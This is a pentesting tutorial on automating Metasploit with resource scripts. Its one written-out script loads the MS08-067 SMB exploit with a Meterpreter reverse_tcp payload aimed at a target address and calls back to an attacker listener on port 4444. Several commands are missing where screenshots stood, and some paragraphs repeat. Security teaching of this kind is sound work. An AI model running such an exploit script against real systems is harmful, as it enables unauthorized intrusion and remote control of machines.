There are many ways automation in Metasploit. We are discussing about resource script in our tutorial.
A resource script is actually a bunch of commands that runs in an automatic way when the scripts loaded. Metasploit already have a set of preconfigured scripts that is very useful in pentesting. WE can see the list of those scripts in the /usr/share/metasploit-framework/scripts/resource directory. Go to this directory by using file manager or command line in terminal. Open terminal window type following command to go to that directory :
Then type ls command to see the lists of files. Screenshot is following:
Now we are going to learn how to use those scripts.
We start metasploit using msfconsole command.
We have opened metasploit in previous post like the following screenshot:
Some scripts need to set RHOSTS , so we set RHOSTS by using following command.
The output of this command is following:
Now we run an automated metasploit script using following command:
This script will do a basic host discovery scan on the given subnet . The screenshot is following:
How to make own custom resource script
Now we are going to learn how to write a basic custom resource script.
We open up any text editor in our Kali Linux machine and type/paste following text.
Actually we typed all the commands we would want Metasploit Framework to execute.
Then we are saving the in Desktop with any name we are giving the file name demoscript.rc metasploit automation scripts must save with a .rc extension.
Now we start the Metasploit Framework by putting following command in terminal:
Then we start our custom automation script in Metasploit using following command:We open up any text editor in our Kali Linux machine and type/paste following text.
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.15.15
set LHOST 192.168.15.20
set LPORT 4444
exploit -j
Actually we typed all the commands we would want Metasploit Framework to execute.
Then we are saving the in Desktop with any name we are giving the file name demoscript.rc metasploit automation scripts must save with a .rc extension.
Now we start the Metasploit Framework by putting following command in terminal:
Resource Script is not only way of automating Metasploit , we can learn about all six ways of automating Metasploit in this article at https://blog.rapid7.com/2011/12/08/six-ways-to-automate-metasploit/